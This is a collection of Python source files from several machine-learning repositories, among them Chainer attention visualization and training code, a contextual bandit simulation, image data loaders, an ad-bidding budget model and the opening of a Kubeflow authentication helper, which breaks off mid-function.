https://arxiv.org/abs/1412.6856
"""
def __init__(self, args):
self.args = args
self.xp = cuda.cupy if args.gpu>=0 else np
if args.size < 32:
raise ValueError( \
'args.size is must be more than 32 for pyramid spacial pooling.')
def calculate_slice_idxs(self, size, x, y, h, w):
patch_harf_slide = ceil(size/2)
sl_strt_x = int(max(0, x - patch_harf_slide))
sl_end_x = int(min(h, x - patch_harf_slide + size))
sl_strt_y = int(max(0, y - patch_harf_slide))
sl_end_y = int(min(w, y - patch_harf_slide + size))
return sl_strt_x, sl_end_x, sl_strt_y, sl_end_y
def calculate_target_class(self, y, gt):
if self.args.view_type=='gt':
prob = y[0, gt]
target_class = gt
elif self.args.view_type=='infer':
max_class_idx = int(self.xp.argmax(y[0, :]))
prob = y[0, max_class_idx]
target_class = max_class_idx
return prob, target_class,
def crop_patches(self, image):
'''
occluded images is so time consuming.
create image patches instead of occluded images.
thus, score need to be reversed.
do not forget.
'''
n_img, ch, h, w = image.shape
num_occluded_img = \
((h - 1)//self.args.stride+1) * ((w - 1)//self.args.stride+1)
patches = self.xp.zeros( \
(num_occluded_img, ch, self.args.size, self.args.size), \
dtype=np.float32)
window_pos = []
idx = 0
for x, y in product(range(self.args.size//2, h, self.args.stride), \
range(self.args.size//2, w, self.args.stride)):
_img = image.copy()
sl_strt_x, sl_end_x, sl_strt_y, sl_end_y = \
self.calculate_slice_idxs(self.args.size, x, y, h, w)
patch = image[:, :, sl_strt_x:sl_end_x, sl_strt_y:sl_end_y]
if min(patch.shape[2:])<self.args.size:
continue
patches[idx] = patch
window_pos.append([x, y])
idx += 1
window_pos = self.xp.array(window_pos, dtype=np.int32)
return patches[:idx], window_pos
def compute_one_batch_mask( \
self, mask, patches, prob, target_class, w_pos, idx):
n_img, ch, h, w = mask.shape
x_batch = Variable(patches[idx:idx+self.args.patch_batchsize])
self.args.net(x_batch, self.xp.array( \
[target_class]*len(x_batch.data), np.int32))
y_batch = self.args.net.prob.data
patches_prob = y_batch[:, target_class]
# attention score
diff = patches_prob - prob
if self.args.gpu>=0:
threshold = np.percentile(self.xp.asnumpy(diff), self.args.percentile)
else:
threshold = self.xp.percentile(diff, self.args.percentile)
batch_w_pos = w_pos[idx:idx+self.args.patch_batchsize]
crux_coordinate = self.xp.array([batch_w_pos[idx] for idx, flag in \
enumerate(diff > threshold) if flag], dtype=np.float32)
for x, y in crux_coordinate:
sl_strt_x, sl_end_x, sl_strt_y, sl_end_y = \
self.calculate_slice_idxs(self.args.size, x, y, h, w)
mask[:, :, sl_strt_x:sl_end_x, sl_strt_y:sl_end_y] = 1.
return mask
def compute_attention_mask(self, image, gt):
'''
create mask without attention.
image : (3, height, width)
gt : integer
percentile: degree of interest
'''
ch, h, w = image.shape
image = image.reshape(1, ch, h, w).astype(np.float32)
if self.args.gpu >= 0:
image = cuda.to_gpu(image, device=self.args.gpu)
x = Variable(image)
self.args.net(x, self.xp.array([gt], np.int32))
y = self.args.net.prob.data
prob, target_class = self.calculate_target_class(y, gt)
patches, w_pos = self.crop_patches(image)
if self.args.gpu>=0:
patches = cuda.to_gpu(patches, device=self.args.gpu)
mask = self.xp.zeros_like(image)
for idx in range(0, len(patches), self.args.patch_batchsize):
mask = self.compute_one_batch_mask( \
mask, patches, prob, target_class, w_pos, idx)
return mask, target_class
def visualize_attention(self, raw_image, preprocessed_image, gt):
'''
gt : integer
percentile: degree of interest
'''
h, w, _ = raw_image.shape
mask, target_class = \
self.compute_attention_mask(preprocessed_image, gt)
mask = mask[0].transpose(1,2,0).astype(np.uint8)
xp = cuda.get_array_module(mask)
if xp!=np:
mask = self.xp.asnumpy(mask)
mask = cv2.resize(mask, (w, h))
return raw_image * mask, target_class
if __name__=='__main__':
args = get_args()
mini_batch_loader = DatasetPreProcessor(args)
visualizer = AttentionVisualizer(args)
_, model_eval = EasyTrainer.prepare_model(args)
args.net = model_eval
for idx, (image_path, label) in enumerate(mini_batch_loader.pairs):
raw_image = cv2.imread(image_path)
preprocessed_image, _ = mini_batch_loader.get_example(idx)
attention_view, target_class = \
visualizer.visualize_attention(raw_image, preprocessed_image, label)
name, extension = os.path.basename(image_path).split('.')
image_fname = name+'_'+str(label)+'_'+str(target_class)+'.'+extension
output_path = os.path.join(args.output_path, 'visualized_attention_images')
if not os.path.exists(output_path):
print("create directory:", output_path)
os.mkdir(output_path)
output_path = os.path.join(output_path, image_fname)
cv2.imwrite(output_path, attention_view)
```
#### File: src/common/trainer_utils.py
```python
import sys, os
sys.path.append('./src/common')
sys.path.append('./src/common/image_processor')
sys.path.append('./src/net')
sys.path.append('./src/net/RAM')
sys.path.append('./src/net/caption_generator')
sys.path.append('./src/net/feedback')
sys.path.append('./experiment_settings')
from mini_batch_loader import DatasetPreProcessor
from important_serial_iterator import ImportantSerialIterator
from copy_model import copy_model
import chainer
import chainer.functions as F
from chainer import serializers
from chainer import cuda, Variable
from chainer import Reporter, report, report_scope
from chainer import optimizers, serializers, training
from chainer.training import extensions
import importlib
class EasyTrainer(object):
def __init__(self, args, settings_type):
self.args = args
self.settings_type = settings_type
@staticmethod
def prepare_model(args):
model = getattr(
importlib.import_module(args.archtecture.module_name), \
args.archtecture.class_name) \
(args.n_class, args.in_ch)
if os.path.exists(args.initial_model):
print('Load model from', args.initial_model, file=sys.stderr)
serializers.load_npz(args.initial_model, model)
if args.gpu >= 0:
chainer.cuda.get_device(args.gpu).use()
model.to_gpu()
model.train = True
model.n_class = args.n_class
m_eval = model.copy()
m_eval.train = False
model.active_learn = args.active_learn
return model, m_eval
def select_optimizer(self):
if self.args.training_params.optimizer=='RMSpropGraves':
return chainer.optimizers.RMSpropGraves(self.args.training_params.lr)
elif self.args.training_params.optimizer=='Adam':
return chainer.optimizers.Adam()
elif self.args.training_params.optimizer=='AdaDelta':
return chainer.optimizers.AdaDelta()
elif self.args.training_params.optimizer=='NesterovAG':
return chainer.optimizers.NesterovAG(self.args.training_params.lr)
elif self.args.training_params.optimizer=='MomentumSGD':
return chainer.optimizers.MomentumSGD(self.args.training_params.lr)
def prepare_optimizer(self, model):
optimizer = self.select_optimizer()
optimizer.setup(model)
# print("optimizer.target.params()")
# print(optimizer.target.__dict__)
# optimizer.target.__dict__ = {k: v for k, v in optimizer.target.__dict__.items() if "memory_" not in k}
# print(optimizer.target.__dict__)
# optimizer.target._params = (param for param in optimizer.target.params() if "memory_" not in param.name)
# print([param for param in optimizer.target.params()])
if self.args.training_params.weight_decay:
optimizer.add_hook(chainer.optimizer.WeightDecay( \
self.args.training_params.weight_decay))
if self.args.training_params.lasso:
optimizer.add_hook(chainer.optimizer.Lasso( \
self.args.training_params.weight_decay))
if self.args.training_params.clip_grad:
optimizer.add_hook(chainer.optimizer.GradientClipping( \
self.args.training_params.clip_value))
return optimizer
def prepare_dataset(self):
mode_settings = importlib.import_module(self.settings_type)
train_args = mode_settings.get_args('train')
# load dataset
if chainer.config.user_data_set=='mnist':
train_mini_batch_loader, test_mini_batch_loader = \
chainer.datasets.get_mnist()
else:
train_mini_batch_loader = DatasetPreProcessor(train_args)
test_mini_batch_loader = DatasetPreProcessor(get_args('test'))
if train_args.importance_sampling:
print("importance----------")
train_it = ImportantSerialIterator( \
train_mini_batch_loader, \
train_args.training_params.batch_size, \
shuffle=train_args.shuffle, \
p=np.loadtxt(train_args.weights_file_path))
else:
if train_args.training_params.iter_type=='multi':
iterator = chainer.iterators.MultiprocessIterator
else:
iterator = chainer.iterators.SerialIterator
train_it = iterator( \
train_mini_batch_loader, \
train_args.training_params.batch_size, \
shuffle=train_args.shuffle)
val_batch_size = 1
val_it = iterator( \
test_mini_batch_loader, \
val_batch_size, repeat=False, shuffle=False)
return train_it, val_it, train_mini_batch_loader.__len__()
def prepare_updater(self, train_it, optimizer):
if self.args.training_params.updater_type=='standerd':
return training.StandardUpdater( \
train_it, optimizer, device=self.args.gpu)
elif self.args.training_params.updater_type=='parallel':
return training.ParallelUpdater( \
train_it, optimizer, devices={'main': 1, 'second': 0})
def run_trainer(self):
# load model
model, model_for_eval = self.prepare_model(self.args)
print("---set model----------")
# Setup optimizer
optimizer = self.prepare_optimizer(model)
print("---set optimzer----------")
# load data
train_it, val_it, train_data_length = self.prepare_dataset()
print("---set data----------")
updater = self.prepare_updater(train_it, optimizer)
print("---set updater----------")
evaluator_interval = self.args.training_params.report_epoch, 'epoch'
snapshot_interval = self.args.training_params.snapshot_epoch, 'epoch'
log_interval = self.args.training_params.report_epoch, 'epoch'
trainer = training.Trainer( updater, \
(self.args.training_params.epoch, 'epoch'), out=self.args.output_path)
trainer.extend( \
extensions.Evaluator(val_it, model_for_eval, device=self.args.gpu), \
trigger=evaluator_interval)
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.snapshot(), trigger=snapshot_interval)
trainer.extend(extensions.snapshot_object( \
model, 'model_iter_{.updater.iteration}'), trigger=snapshot_interval)
if self.args.training_params.optimizer!='Adam' \
and self.args.training_params.optimizer!='AdaDelta':
trainer.extend(extensions.ExponentialShift( \
'lr', self.args.training_params.decay_factor), \
trigger=(self.args.training_params.decay_epoch, 'epoch'))
trainer.extend(extensions.observe_lr(), trigger=log_interval)
trainer.extend(extensions.LogReport(trigger=log_interval))
trainer.extend(extensions.PrintReport([ \
'epoch', 'iteration', 'main/loss', 'validation/main/loss', \
'main/accuracy', 'validation/main/accuracy', \
]), trigger=log_interval)
trainer.extend(extensions.ProgressBar(update_interval=1))
print("---set trainer----------")
if os.path.exists(self.args.resume):
print('resume trainer:{}'.format(self.args.resume))
# Resume from a snapshot
serializers.load_npz(self.args.resume, trainer)
trainer.run()
``` |
{
"source": "0shimax/chainer-PRNN",
"score": 3
} |
#### File: 0shimax/chainer-PRNN/persistent_memory_function.py
```python
import numpy
import chainer
from chainer import function_node
class PersistentMemoryFunction(function_node.FunctionNode):
def forward(self, inputs):
self.retain_inputs((0, 1))
x, memory = inputs
batch = len(x)
if (isinstance(x, numpy.ndarray) and
not (x.flags.c_contiguous or x.flags.f_contiguous) and
1 in x.shape):
x = numpy.ascontiguousarray(x)
y = x.dot(memory).astype(x.dtype, copy=False)
# self.retain_outputs((0,))
return y
def backward(self, indexes, grad_outputs):
x, memory = self.get_retained_inputs()
gy, = grad_outputs
ret = []
gx, = MemoryGradData().apply((memory, gy))
ret.append(chainer.functions.cast(gx, x.dtype))
gm, = MemoryGradWeight().apply((x, gy))
ret.append(chainer.functions.cast(gm, memory.dtype))
return ret
class MemoryGradData(function_node.FunctionNode):
def forward(self, inputs):
self.retain_inputs((0, 1))
memory, gy = inputs
if (isinstance(gy, numpy.ndarray) and
not (gy.flags.c_contiguous or gy.flags.f_contiguous) and
1 in gy.shape):
gy = numpy.ascontiguousarray(gy)
gx = gy.dot(memory).astype(gy.dtype, copy=False)
return gx,
def backward(self, indexes, grad_outputs):
memory, gy = self.get_retained_inputs()
ggx, = grad_outputs
ret = []
gm, = MemoryGradWeight().apply((ggx, gy))
ret.append(chainer.functions.cast(gm, memory.dtype))
ggy = persistent_memory(ggx, memory)
ret.append(chainer.functions.cast(ggy, gy.dtype))
return ret
class MemoryGradWeight(function_node.FunctionNode):
def forward(self, inputs):
self.retain_inputs((0, 1))
x, gy = inputs
if (isinstance(gy, numpy.ndarray) and
not (gy.flags.c_contiguous or gy.flags.f_contiguous) and
1 in gy.shape):
gy = numpy.ascontiguousarray(gy)
gW = gy.T.dot(x).astype(gy.dtype, copy=False)
return gW,
def backward(self, indexes, grad_outputs):
x, gy = self.get_retained_inputs()
ggW, = grad_outputs
ret = []
gx, = MemoryGradData().apply((ggW, gy))
ret.append(chainer.functions.cast(gx, x.dtype))
ggy = persistent_memory(x, ggW)
ret.append(chainer.functions.cast(ggy, gy.dtype))
return ret
def persistent_memory(x, memory):
x = x.reshape(len(x), -1)
args = x, memory
y, = PersistentMemoryFunction().apply(args)
return y
```
#### File: 0shimax/chainer-PRNN/persistent_memory_link.py
```python
import functools
import operator
from chainer import initializers
from chainer import link
from chainer import variable
import chainer.functions as F
from persistent_memory_function import persistent_memory
class PersistentMemory(link.Chain):
def __init__(self, in_size, slot_size, memory_size, initialW=None):
"""
in_size: hidden_state h_size
"""
super().__init__()
self.slot_size = slot_size
self.memory_size = memory_size
with self.init_scope():
W_initializer = initializers._get_initializer(initialW)
self.memory = variable.Parameter(W_initializer)
self.projection_matrix = variable.Parameter(W_initializer)
def _initialize_params(self, in_size):
self.memory.initialize((self.memory_size, self.slot_size))
self.projection_matrix.initialize((in_size, self.memory_size))
def calculate_memory_weight(self, in_size, hidden_state):
# print("hidden_state", hidden_state)
DM = F.matmul(self.projection_matrix, self.memory) # (in_size, slot_size)
# print("DM----", DM)
sim = F.matmul(hidden_state, DM) # (batch_size, slot_size)
# print("sim----", sim)
n_batch, n_slot = sim.shape
normed_hidden = F.reshape(F.batch_l2_norm_squared(hidden_state), (-1, 1))
sim = F.exp(F.log(1+sim) - F.log(1+F.tile(normed_hidden, (1, n_slot))))
# sim /= F.tile(normed_hidden, (1, n_slot)) # (batch_size, slot_size)/(batch_size,)
sim = F.exp(F.log(1+sim) - F.log(1+F.tile(F.sum(DM*DM, axis=0), (n_batch, 1))))
# sim /= F.tile(
# F.sum(DM*DM, axis=0), (n_batch, 1)) # (batch_size, slot_size)/(slot_size,)
return F.softmax(sim) # (batch_size, slot_size)
def __call__(self, x):
in_size = None
if self.memory.data is None:
in_size = functools.reduce(operator.mul, x.shape[1:], 1)
self._initialize_params(in_size)
self.weight = self.calculate_memory_weight(in_size, x)
n_batch, n_slot = self.weight.shape
n_memory, _ = self.memory.shape
# (batch_size, slot_size)*(memory_size, slot_size)
wm = F.reshape(
F.tile(self.weight, (1, n_memory)), (-1, n_memory, n_slot)) \
* F.tile(self.memory, (n_batch, 1, 1))
return F.sum(wm, axis=2)
``` |
{
"source": "0shimax/contextual-bandit",
"score": 3
} |
#### File: 0shimax/contextual-bandit/contextual_multi_arms_bandits.py
```python
import numpy as np
from numpy.random import uniform, randint
np.random.seed(555)
class Arm:
def __init__(self, feature_dim, content_id, alpha=0.01):
self.content_id = content_id
self.alpha = alpha # regularization parameter
self.norm_mean = np.zeros((1, feature_dim))
# Covariance matrix:
# Store diagonal components only to increase memory efficiency
self.cov_matrix = np.ones((1, feature_dim))
self.win_rate = 0
self.win = 0
self.lose = 0
def update(self, features, is_click):
features = features.reshape((1,features.shape[0]))
self.cov_matrix += np.diag(features.T.dot(features))
self.norm_mean += is_click*features
if is_click:
self.win+=1
else:
self.lose+=1
self.win_rate = self.win/(self.win + self.lose)
def predict(self, features):
features = features.reshape((features.shape[0],1))
# Since the covariance matrix preserves only the diagonal components,
# it suffices to take the inverse matrix
theta = (1/self.cov_matrix)*self.norm_mean # [1, feature_dim]
# Again, the inverse matrix of the covariance matrix
# is computed by taking reciprocal
return theta.dot(features) + \
self.alpha*np.sqrt((features.T*(1/self.cov_matrix)).dot(features))
def print_result(self):
print('content_id:{}, total_num:{}, win_rate:{}'.format(\
self.content_id, self.win+self.lose, self.win_rate))
class Viewer:
def __init__(self, gender='man'):
self.gender = gender
def view(self, content_id):
if self.gender == 'man':
# Men are easy to click on ads with id 5 or less
if content_id<6:
return True if uniform(0, 1.0) > 0.3 else False
else:
return True if uniform(0, 1.0) > 0.7 else False
else:
# Women are easy to click on ads with id 6 or higher
if content_id > 5:
return True if uniform(0, 1.0) > 0.3 else False
else:
return True if uniform(0, 1.0) > 0.7 else False
class Rulet:
def __init__(self, feature_dim):
self.arms = {}
self.feature_dim = feature_dim
def generate_arm(self, content_id):
if content_id not in self.arms:
self.arms[content_id] = Arm(self.feature_dim, content_id)
return self.arms[content_id]
def generate_features(self):
viewer = Viewer(self.generate_gender())
features = np.array([1,0]) if viewer.gender=='man' else np.array([0,1])
content_id = self.generate_content()
return features, viewer.view(content_id), self.generate_arm(content_id)
def generate_content(self):
return randint(1, 10)
def generate_gender(self):
return 'man' if uniform(0, 1.0) > 0.5 else 'women'
if __name__=='__main__':
'''Context is for men and women only
Men are easy to click on ads with id 5 or less
Women are easy to click on ads with id 6 or higher
'''
alpha = 0.0001 # regularization parameter
feature_dim = 2
num_of_views = 10000
rulet = Rulet(feature_dim)
for step in range(num_of_views):
features, is_clicked, arm = rulet.generate_features()
arm.update(features, is_clicked)
# Confirmation of prediction accuracy when the number of data is small
if step<2000:
arm.print_result()
print('print result======')
for content_id, arm in rulet.arms.items():
arm.print_result()
print('Click rate when men browse:' + str(arm.predict(np.array([1,0]))) )
print('Click rate when women browse:'+ str(arm.predict(np.array([0,1]))) )
``` |
{
"source": "0shimax/DL-vision",
"score": 3
} |
#### File: common/image_processor/mini_batch_loader.py
```python
import os, sys
sys.path.append('./src/common/image_processor')
import chainer
import cv2
import numpy as np
from contextlib import ExitStack
import numbers
from image_normalizer import ImageNormalizer
class DatasetPreProcessor(chainer.dataset.DatasetMixin):
def __init__(self, args):
"""args type is EasyDict class
"""
self.args = args
self.gray = args.converse_gray
self.image_normalizer = ImageNormalizer()
self.pairs = self.load_pairs()
self.counter = 0
self.image_size_in_batch = [None, None] # height, width
def __len__(self):
return len(self.pairs)
def __init_batch_counter(self):
if self.args.train and self.counter==self.args.training_params.batch_size:
self.counter = 0
self.image_size_in_batch = [None, None]
def __set_image_size_in_batch(self, image):
if self.counter==1:
resized_h, resized_w = image.shape[:2]
self.image_size_in_batch = [resized_h, resized_w]
def get_example(self, index):
self.counter += 1
if self.args.debug_mode:
if self.counter>15:
assert False, 'stop test'
image, label = self.pairs[index]
# gray transform if converse_gray is True
image = self.color_trancefer(image)
h, w, ch = image.shape
if image is None:
raise RuntimeError("invalid image: {}".format(path))
# resizing image
if self.args.do_resize:
if self.counter>1:
# augmentas is ordered w,h in resize method of openCV
scale = self.image_size_in_batch[1]/w, self.image_size_in_batch[0]/h
image= self.resize_image(image, scale)
else:
image= self.resize_image(image)
elif self.args.crop_params.flag:
image = self.crop_image(image)
# print('resizing done-------------')
# augmentat image
if self.args.aug_params.do_augment:
image = self.augment_image(image)
# store image size
# because dimension must be equeal per batch
self.__set_image_size_in_batch(image)
# print('augmentation done-------------')
# image normalize
image = getattr(self.image_normalizer, \
self.args.im_norm_type.method)(image, self.args.im_norm_type.opts)
# print('normalization done-------------')
if self.args.debug_mode:
cv2.imshow('image', image)
cv2.waitKey(0)
cv2.destroyAllWindows()
print(image.shape)
print('label:', label)
# transpose for chainer
image = image.transpose(2, 0, 1)
# initialize batch counter
self.__init_batch_counter()
return image.astype(np.float32), np.array(label, dtype=np.int32)
def load_pairs(self):
image_label_pairs = []
for image, label in self.image_label_pair_generator():
image_label_pairs.append((image, label))
return image_label_pairs
def image_label_pair_generator(self):
import pickle
def __unpickle(file_name):
with open(file_name, 'rb') as f_cifar10:
pairs = pickle.load(f_cifar10, encoding='latin-1')
return pairs
pair = __unpickle(self.args.image_pointer_path)
for image, label in zip(pair["data"], pair['labels']):
yield image.reshape((3,32,32)).transpose(1,2,0), label
def color_trancefer(self, image):
h, w, _ = image.shape
if self.args.converse_gray:
image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY).reshape((h,w,1))
# elif self.yuv:
# image = cv2.cvtColor(image, cv2.COLOR_RGB2YCrCb).astype(np.float32)
else:
image = image.astype(np.float32)
return image
def augment_image(self, image):
if self.args.aug_params.params.do_scale and self.counter==1:
image = self.scaling(image)
if self.args.aug_params.params.do_flip:
image = self.flip(image)
if self.args.aug_params.params.change_britghtness:
image = self.random_brightness(image)
if self.args.aug_params.params.change_contrast:
image = self.random_contrast(image)
if self.args.aug_params.params.do_rotate:
image = self.rotate_image(image)
if self.args.aug_params.params.do_shift:
image = self.shift_image(image)
return image
def resize_image(self, image, scale=None):
xh, xw = image.shape[:2]
if scale is None:
# if scale is not difinded, calculate scale as closest multiple number.
scale = float(xh)/(xh//self.args.multiple)/self.args.multiple
#float(xw)/(xw//self.args.multiple)/self.args.multiple,
scale = scale, scale
elif isinstance(scale, numbers.Number):
scale = scale, scale
elif isinstance(scale, tuple) and len(scale)>2:
raise InvalidArgumentError
new_sz = (int(xw*scale[0])+1, int(xh*scale[1])+1) # specification of opencv, argments is recepted (w, h)
# image = image[::inv_resize_scale,::inv_resize_scale]
image = cv2.resize(image, new_sz)
xh, xw = image.shape[:2]
m0, m1 = xh % self.args.multiple, xw % self.args.multiple
d0, d1 = np.random.randint(m0+1), np.random.randint(m1+1)
image = image[d0:(image.shape[0] - m0 + d0), d1:(image.shape[1] - m1 + d1)]
if len(image.shape)==2:
return image.reshape((image.shape[0], image.shape[1], 1))
else:
return image
def flip(self, image):
do_flip_xy = np.random.randint(0, 2)
do_flip_x = np.random.randint(0, 2)
do_flip_y = np.random.randint(0, 2)
if do_flip_xy: # Transpose X and Y axis
image = image[::-1, ::-1, :]
elif do_flip_x: # Flip along Y-axis
image = image[::-1, :, :]
elif do_flip_y: # Flip along X-axis
image = image[:, ::-1, :]
return image
def scaling(self, image):
do_scale = np.random.randint(0, 2)
if do_scale:
scale = self.args.aug_params.params.scale[ \
np.random.randint(0,len(self.args.aug_params.params.scale))]
return self.resize_image(image, scale)
else:
return image
def random_brightness(self, image, max_delta=63, seed=None):
brightness_flag = np.random.randint(0, 2)
if brightness_flag:
delta = np.random.uniform(-max_delta, max_delta)
return image + delta
else:
return image
def random_contrast(self, image, lower=0.2, upper=1.8, seed=None):
contrast_flag = np.random.randint(0, 2)
if contrast_flag:
factor = np.random.uniform(-lower, upper)
im_mean = image.mean(axis=2)
return ((image.transpose(2, 0, 1) - im_mean)*factor + im_mean).transpose(1,2,0).astype(np.uint8)
else:
return image
def shift_image(self, image):
do_shift_xy = np.random.randint(0, 2)
do_shift_x = np.random.randint(0, 2)
do_shift_y = np.random.randint(0, 2)
if do_shift_xy:
lr_shift = self.args.aug_params.params.lr_shift[ \
np.random.randint(0,len(self.args.aug_params.params.lr_shift))]
ud_shift = self.args.aug_params.params.ud_shift[ \
np.random.randint(0,len(self.args.aug_params.params.ud_shift))]
elif do_shift_y:
lr_shift = 0
ud_shift = self.args.aug_params.params.ud_shift[ \
np.random.randint(0,len(self.args.aug_params.params.ud_shift))]
elif do_shift_x:
lr_shift = self.args.aug_params.params.lr_shift[ \
np.random.randint(0,len(self.args.aug_params.params.lr_shift))]
ud_shift = 0
if do_shift_xy or do_shift_y or do_shift_y:
h, w, ch = image.shape
affine_matrix = np.float32([[1,0,lr_shift],[0,1,ud_shift]]) # 横、縦
image = cv2.warpAffine(image, affine_matrix, (w,h))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def rotate_image(self, image):
do_rotate = np.random.randint(0, 2)
if do_rotate:
h, w, ch = image.shape
rotation_angle = self.args.aug_params.params.rotation_angle[ \
np.random.randint(0,len(self.args.aug_params.params.rotation_angle))]
affine_matrix = cv2.getRotationMatrix2D((h/2, w/2), rotation_angle, 1)
image = cv2.warpAffine(image, affine_matrix, (w,h))
return self.__reshpe_channel(image, (h,w,ch))
else:
return image
def crop_image(self, image):
h, w, ch = image.shape
top = int((w-self.args.crop_params.size)/2)
left = int((h-self.args.crop_params.size)/2)
return image[left:left+self.args.crop_params.size,top:top+self.args.crop_params.size,:]
def __reshpe_channel(self, image, im_shape ):
if len(image.shape)==2:
return image.reshape(im_shape)
else:
return image
``` |
{
"source": "0shimax/Easy-Over-Complete-Distribution",
"score": 3
} |
#### File: src/feature/data_loader.py
```python
from pathlib import Path
import numpy
from skimage import io
import torch
from torchvision import datasets, transforms
from torch.utils.data import Dataset
from PIL import Image
from feature.utils import ImageTransform
class WBCDataset(Dataset):
def __init__(self, image_labels, root_dir,
subset="Dataset1", transform=ImageTransform()):
super().__init__()
self.image_labels = image_labels
self.root_dir = root_dir
self.subset = subset
self.transform = transform
def __len__(self):
return len(self.image_labels)
def __getitem__(self, idx):
img_name, label = self.image_labels[idx]
image_path = Path(self.root_dir, self.subset, "{0:03}.bmp".format(img_name))
image = io.imread(image_path)
if self.transform:
image = Image.fromarray(numpy.uint8(image))
image = self.transform(image)
return image, torch.LongTensor([label])
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=4)
return loader
```
#### File: model/visualizer/lime_visualizer.py
```python
from pathlib import Path
import matplotlib.pyplot as plt
import numpy as np
import torch
from skimage.segmentation import mark_boundaries
from lime import lime_image
explainer = lime_image.LimeImageExplainer()
def normalize(x):
return np.array((x - np.min(x)) / (np.max(x) - np.min(x)))
def visualize(args, image, predict_fn, img_idx, label_id, gt_id, num_samples=1000):
data = image.transpose(2,1).transpose(3,2).squeeze(0).numpy()
explanation = explainer.explain_instance(data, predict_fn, top_labels=5, hide_color=0, num_samples=num_samples)
temp, mask = explanation.get_image_and_mask(int(gt_id), positive_only=False, num_features=1000, hide_rest=True)
out = mark_boundaries(temp / 2 + 0.5, mask)
out = normalize(out)
plt.imsave(Path(args.out_dir, "visualized", "testimg{}_gt{}_pred{}.jpeg".format(img_idx, gt_id, label_id)), out)
plt.imsave(Path(args.out_dir, "visualized", "testimg{}.jpeg".format(img_idx)), normalize(data))
``` |
{
"source": "0shimax/effective-budget-management",
"score": 3
} |
#### File: src/model/bid.py
```python
from dataclasses import dataclass
import math
import numpy
from scipy.optimize import curve_fit
from model.sub_funcs import imp_for_bid_price, win_rate, calculate_mprice
@dataclass
class bid(object):
n_of_time_slot: int = 0
current_time_slot: int = 0
average_market_price: float = 0.0
ideal_spend: dict = {}
current_spend: dict = {}
# win-rate vs budget distribution params
bid_pram_k_1: float = 1e-3
bid_pram_k_2: float = 1e-3
bid_pram_lambda: float = 1e-3
# budget
total_budget: float = 0.0
slot_budget: dict = {}
pctr_threshold: dict = {}
# power-law distribution params
dist_param_c: float = 1e-3
dist_param_alpha: float = 1e-3
def set_market_price(
self, pctrs: numpy.ndarray, mprices: numpy.ndarray, threshold: float
) -> None:
self.average_market_price = calculate_mprice(pctrs, mprices, threshold)
def fit_imp_bid_func(self, n_of_imps: numpy.ndarray, bid_prices: numpy.ndarray):
popt, _ = curve_fit(imp_for_bid_price, n_of_imps, bid_prices)
self.dist_param_c, self.dist_param_alpha = popt
def fit_win_rate_func(self, win_rates: numpy.ndarray, bid_prices: numpy.ndarray):
popt, _ = curve_fit(win_rate, win_rates, bid_prices)
self.bid_pram_k_1, self.bid_pram_k_2 = popt
def bid_price(self) -> float:
tmp = self.bid_pram_lambda * self.bid_pram_k_2 ** 2
tmp += self.pctr() * self.bid_pram_k_1 * self.bid_pram_k_2
tmp /= self.bid_pram_lambda * self.bid_pram_k_1 ** 2
tmp = math.sqrt(tmp)
tmp -= self.bid_pram_k_2 / self.bid_pram_k_1
return self.adjustment_by_sp() * tmp
def pctr(self) -> float:
pass
def adjustment_by_sp(self) -> float:
return (
self.ideal_spend[self.current_time_slot]
/ self.current_spend[self.current_time_slot]
)
def update_budget_for_each_slot(self) -> None:
slot_budgets = self.slot_budget.values()
tmp = self.total_budget - sum(
[self.current_spend[i] for i in range(1, self.current_time_slot)]
)
tmp *= self.slot_budget[self.current_time_slot]
tmp /= sum(slot_budgets)
self.slot_budget[self.current_time_slot] = tmp
def update_pctr_threshold(self) -> None:
tmp = 1.0 - self.dist_param_alpha
tmp /= (
self.dist_param_c
* self.average_market_price
* self.slot_budget[self.current_time_slot]
)
self.pctr_threshold[
self.current_time_slot
] = 1.0 - self.dist_param_alpha * math.sqrt(1 - tmp)
``` |
{
"source": "0shimax/GBDT2DNN",
"score": 3
} |
#### File: src/data/data_loader.py
```python
from pathlib import Path
import torch
from torch.utils.data import Dataset
class MyDataset(Dataset):
def __init__(self, features, labels, gbdt_model, transform=None, is_train=False):
super().__init__()
self.transform = transform
self.is_train = is_train
self.features = features
self.labels = labels
self.gbdt_model = gbdt_model
def __len__(self):
return len(self.features)
def __getitem__(self, idx):
feature = self.features[idx]
label = self.labels[idx]
feature_for_dnn = self.gbdt_model.apply(feature.reshape(1, -1))
return torch.LongTensor([feature_for_dnn]), torch.LongTensor([label])
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=4)
return loader
``` |
{
"source": "0shimax/kedro-kubeflow",
"score": 2
} |
#### File: kedro-kubeflow/kedro_kubeflow/auth.py
```python
import logging
import os
import re
from urllib.parse import urlsplit, urlunsplit
import requests
IAP_CLIENT_ID = "IAP_CLIENT_ID"
DEX_USERNAME = "DEX_USERNAME"
DEX_PASSWORD = "<PASSWORD>"
class AuthHandler(object):
log = logging.getLogger(__name__)
def obtain_id_token(self):
from google.auth.exceptions import DefaultCredentialsError
from google.auth.transport.requests import Request
from google.oauth2 import id_token
client_id = os.environ.get(IAP_CLIENT_ID, None)
jwt_token = None
if not client_id:
self.log.debug(
"No IAP_CLIENT_ID provided, skipping custom IAP authentication"
)
return jwt_token
try:
self.log.debug("Attempt to get IAP token for %s." + client_id)
jwt_token = id_token.fetch_id_token(Request(), client_id)
self.log.info("Obtained JWT token for IAP proxy authentication.")
except DefaultCredentialsError as ex:
self.log.warning(
str(ex)
+ (
" Note that this authentication method does not work with default"
" credentials obtained via 'gcloud auth application-default login'"
" command. Refer to documentation on how to configure service account"
" locally"
" (https://cloud.google.com/docs/authentication/production#manually)"
)
)
except Exception as e:
self.log.error("Failed to obtain IAP access token. " + str(e))
finally:
return jwt_token
def obtain_dex_authservice_session(self, kfp_api):
if DEX_USERNAME not in os.environ or DEX_PASSWORD not in os.environ:
self.log.debug(
"Skipping DEX authentication due to missing env variables"
)
return None
s = requests.Session()
r = s.get(kfp_api)
form_relative_url = re.search(
'/dex/auth/local\\?req=([^"]*)', r.text
).group(0)
kfp_url_parts = urlsplit(kfp_api)
form_absolute_url = urlunsplit(
[
kfp_url_parts.scheme,
kfp_url_parts.netloc,
